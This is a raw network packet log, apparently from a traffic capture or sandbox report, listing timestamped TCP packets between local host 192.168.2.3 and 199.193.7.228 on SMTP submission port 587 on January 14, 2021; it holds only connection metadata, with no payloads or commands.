Jan 14, 2021 08:00:30.619389057 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.620498896 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.743371964 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.746299028 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.746830940 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.812020063 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.812251091 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.903316021 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.937248945 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.939677954 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:30.941220999 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:30.992950916 CET	49754	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.002490997 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.003150940 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.003526926 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.093689919 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.093779087 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.094363928 CET	587	49757	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.094477892 CET	49757	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.110219955 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.183346987 CET	587	49754	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.193689108 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.194231033 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.300574064 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.300693035 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.384697914 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.384725094 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.384754896 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.384881020 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.386060953 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.386859894 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.492677927 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.492913961 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.576247931 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.576266050 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.576910973 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.577634096 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.578224897 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.682715893 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.682878017 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.683123112 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.768618107 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.770227909 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.779473066 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.779926062 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.843647003 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.873045921 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.873605967 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:31.969876051 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.969988108 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.972146988 CET	587	49758	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:31.972223043 CET	49758	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.034614086 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.034708977 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.063505888 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.063812017 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.063855886 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.063921928 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.072623968 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.073684931 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.174410105 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.227066040 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.227708101 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.262481928 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.262510061 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.263437986 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.264033079 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.264563084 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.365046978 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.367419958 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.417946100 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.418627977 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.419456005 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.454296112 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.456082106 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.458937883 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.560264111 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.561613083 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.609837055 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.611027956 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.648736954 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.652333975 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.653614998 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.684365034 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.751729965 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.752177954 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.752501011 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.801453114 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.801492929 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.801556110 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.802751064 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.803828955 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.846877098 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.846929073 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.847004890 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.874306917 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.874403000 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.874764919 CET	587	49759	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.874831915 CET	49759	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:32.968230009 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.993119955 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.993145943 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.994041920 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:32.994416952 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.011921883 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.043143988 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.084434032 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.084923029 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.085820913 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.274909019 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.274986029 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.275139093 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.275192976 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.276173115 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.276288986 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.276360035 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.277081013 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.280075073 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.324491978 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.332084894 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.466435909 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.466464996 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.466989994 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.467431068 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.468945026 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.512005091 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.512254000 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.512440920 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.522453070 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.529082060 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.530229092 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.702359915 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.702389002 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.702641964 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.702919006 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.703413963 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.704015970 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.720583916 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.724122047 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.725086927 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.731782913 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.892878056 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.893932104 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.896460056 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.898761988 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.904666901 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.915412903 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.921804905 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.922094107 CET	587	49761	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.922221899 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.926681042 CET	49761	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:33.940170050 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:33.940685034 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.060177088 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.094821930 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.094850063 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.094865084 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.094961882 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.096810102 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.097992897 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.131834984 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.132898092 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.133876085 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.134064913 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.134203911 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.134500027 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.134682894 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.134815931 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.134931087 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.135060072 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.250597954 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.250706911 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.286837101 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.286859989 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.289345026 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.289366961 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.290270090 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.324059963 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.324136019 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.324258089 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.324619055 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.324945927 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.324959993 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.324970007 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.325217962 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.337260008 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.387008905 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.443994999 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.480217934 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.482108116 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:34.496454000 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.527642965 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.810471058 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:34.812375069 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.000694990 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.001105070 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.001420975 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.002397060 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.006248951 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.006685972 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.044989109 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.051525116 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.191286087 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.196543932 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.199397087 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.199613094 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.200592041 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.234985113 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.235114098 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.235369921 CET	587	49762	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.235416889 CET	49762	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.241724014 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.242217064 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.242233038 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.242331982 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.243031979 CET	49760	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.265630007 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.390413046 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.390573978 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.390587091 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.390697956 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.392337084 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.393368959 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.433275938 CET	587	49760	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.456878901 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.457132101 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.582166910 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.582190037 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.583184004 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.583444118 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.651307106 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:35.777748108 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:35.782859087 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.264534950 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.264903069 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.454860926 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.455063105 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.455297947 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.455629110 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.456398964 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.459969997 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.505249023 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.645940065 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.649820089 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.652359962 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.652565956 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.695389032 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.695574999 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.695661068 CET	587	49763	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:36.695719957 CET	49763	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.777884007 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:36.945121050 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.135816097 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.135915041 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.135941029 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.136075974 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.138338089 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.139394045 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.327548027 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.332096100 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.332138062 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.332468987 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.332906008 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.333446980 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.518155098 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.518312931 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.523411036 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.524504900 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.525010109 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.709633112 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.709914923 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.715027094 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.717695951 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.718219995 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.785322905 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.900363922 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.901084900 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.901420116 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.908201933 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.913217068 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.913656950 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.966511011 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:37.975832939 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:37.975950956 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.092577934 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.093301058 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.106982946 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.130798101 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.131005049 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.160485029 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.160540104 CET	587	49764	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.160623074 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.160648108 CET	49764	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.167083025 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.167381048 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.198014975 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.283510923 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.283612013 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.283634901 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.283817053 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.285633087 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.286657095 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.357254028 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.357604980 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.358040094 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.388699055 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.388828039 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.475761890 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.475785017 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.476655960 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.476993084 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.477520943 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.548203945 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.548923016 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.580416918 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.580915928 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.667679071 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.669605017 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.670562983 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.739017963 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.739587069 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.739768982 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.741323948 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.742310047 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.771006107 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.771435976 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.774426937 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.860726118 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.863714933 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.866451979 CET	49765	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.931524992 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.931556940 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.932456017 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.932785988 CET	587	49767	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.933402061 CET	49767	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:38.964509964 CET	587	49768	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:38.965153933 CET	49768	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:00:39.057101965 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.062688112 CET	587	49765	199.193.7.228	192.168.2.3
Jan 14, 2021 08:00:39.065613985 CET	49765	587	192.168.2.3	199.193.7.228
